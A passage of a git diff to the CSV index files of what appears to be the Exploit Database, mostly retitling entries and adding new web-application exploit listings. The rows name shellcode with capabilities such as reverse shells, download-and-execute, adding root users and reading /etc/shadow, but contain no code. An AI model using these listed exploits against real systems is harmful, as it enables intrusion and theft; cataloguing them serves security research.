id,file,description,date,author,type,platform,port 35722,exploits/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",webapps,php,80 35723,exploits/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",webapps,php, 35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php, -35726,exploits/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php, +35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php, 35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php, 35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp, 35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80 @@ -35252,7 +35255,7 @@ id,file,description,date,author,type,platform,port 36675,exploits/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,webapps,php,80 36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80 36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80 -36678,exploits/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp, +36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp, 36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php, 36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java, 36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php, @@ -35820,7 +35823,7 @@ id,file,description,date,author,type,platform,port 37524,exploits/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,webapps,hardware,80 37527,exploits/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",webapps,hardware, 37528,exploits/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",webapps,php,80 -37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows, +37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows, 37530,exploits/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",webapps,php,80 37531,exploits/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",webapps,hardware, 37532,exploits/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,8080 @@ -35859,7 +35862,7 @@ id,file,description,date,author,type,platform,port 37584,exploits/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",webapps,php, 37585,exploits/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",webapps,php, 37586,exploits/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,webapps,php, -37587,exploits/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php, +37587,exploits/php/webapps/37587.txt,"Getsimple CMS 3.1.2 - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php, 37588,exploits/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,webapps,php,80 37589,exploits/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",webapps,java, 37590,exploits/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",webapps,php, @@ -36482,7 +36485,7 @@ id,file,description,date,author,type,platform,port 38816,exploits/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",webapps,jsp, 38819,exploits/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",webapps,php, 38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php, -38822,exploits/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080 +38822,exploits/windows/webapps/38822.rb,"SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080 38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",webapps,php,80 38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php, 38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",webapps,php,80 @@ -36731,7 +36734,7 @@ id,file,description,date,author,type,platform,port 39282,exploits/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",webapps,php, 39283,exploits/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,webapps,php, 39287,exploits/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",webapps,php, -39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple, +39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple, 39289,exploits/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",webapps,php, 39290,exploits/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,webapps,php, 39291,exploits/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,webapps,php, @@ -37268,6 +37271,17 @@ id,file,description,date,author,type,platform,port 43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, 43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php, 43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php, +43883,exploits/windows/webapps/43883.txt,"BMC Track-It! 11.4 - Multiple Vulnerabilities",2015-09-28,"Pedro Ribeiro",webapps,windows, +43884,exploits/hardware/webapps/43884.txt,"Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities",2017-01-31,"Pedro Ribeiro",webapps,hardware, +43885,exploits/hardware/webapps/43885.txt,"SysAid Help Desk 14.4 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",webapps,hardware, +43886,exploits/hardware/webapps/43886.txt,"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,hardware, +43888,exploits/php/webapps/43888.txt,"GetSimple CMS 3.3.1 - Cross-Site Scripting",2014-10-12,"Pedro Ribeiro",webapps,php, +43889,exploits/php/webapps/43889.txt,"CMS Made Simple 1.11.9 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,php, +43892,exploits/multiple/webapps/43892.txt,"ManageEngine Desktop Central - Create Administrator",2015-01-15,"Pedro Ribeiro",webapps,multiple, +43893,exploits/multiple/webapps/43893.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)",2014-11-05,"Pedro Ribeiro",webapps,multiple, +43894,exploits/multiple/webapps/43894.txt,"ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities",2015-02-09,"Pedro Ribeiro",webapps,multiple, +43895,exploits/multiple/webapps/43895.txt,"ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download",2014-12-03,"Pedro Ribeiro",webapps,multiple, +43896,exploits/multiple/webapps/43896.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-09,"Pedro Ribeiro",webapps,multiple, 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php, 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, @@ -37373,6 +37387,7 @@ id,file,description,date,author,type,platform,port 40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",webapps,php, 40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",webapps,php, 40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",webapps,multiple, +43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp, 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple, 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php, 40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index caf48c756..e23d19f81 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1,5 +1,5 @@ id,file,description,date,author,type,platform -14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm +14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix 13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc @@ -36,8 +36,8 @@ id,file,description,date,author,type,platform 13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86 -13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64 -13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 +13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64 +13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator 13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator 13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator @@ -51,8 +51,8 @@ id,file,description,date,author,type,platform 13292,shellcodes/hardware/13292.asm,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware 13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware 13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux -13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64 -13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator +13296,shellcodes/linux_x86-64/13296.c,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64 +13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips @@ -75,7 +75,7 @@ id,file,description,date,author,type,platform 13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86 13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86 -13320,shellcodes/linux_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64 +13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64 13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86 13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86 13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86 @@ -179,7 +179,7 @@ id,file,description,date,author,type,platform 13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86 13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86 -13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13424,shellcodes/linux_x86/13424.c,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 @@ -218,8 +218,8 @@ id,file,description,date,author,type,platform 13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86 13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 -13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 -13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 +13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 +13464,shellcodes/linux_x86-64/13464.s,"Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple 13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple @@ -229,7 +229,7 @@ id,file,description,date,author,type,platform 13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 -13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 +13474,shellcodes/netbsd_x86/13474.c,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86 @@ -249,16 +249,16 @@ id,file,description,date,author,type,platform 13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator 13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc 13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc -13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc +13494,shellcodes/solaris_sparc/13494.c,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc 13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc 13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc -13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc +13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc 13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator 13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 -13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 -13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 -13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware +13501,shellcodes/solaris_x86/13501.c,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13502,shellcodes/solaris_x86/13502.c,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13503,shellcodes/unixware/13503.c,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware 13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86 13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86 @@ -268,7 +268,7 @@ id,file,description,date,author,type,platform 13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86 13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86 13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86 -13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86 +13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86 13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator 13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86 13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86 @@ -287,7 +287,7 @@ id,file,description,date,author,type,platform 13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86 13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86 13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86 -13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64 +13533,shellcodes/windows_x86-64/13533.asm,"Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64 13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86 13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86 @@ -295,7 +295,7 @@ id,file,description,date,author,type,platform 13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows 13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 -13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 +13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) 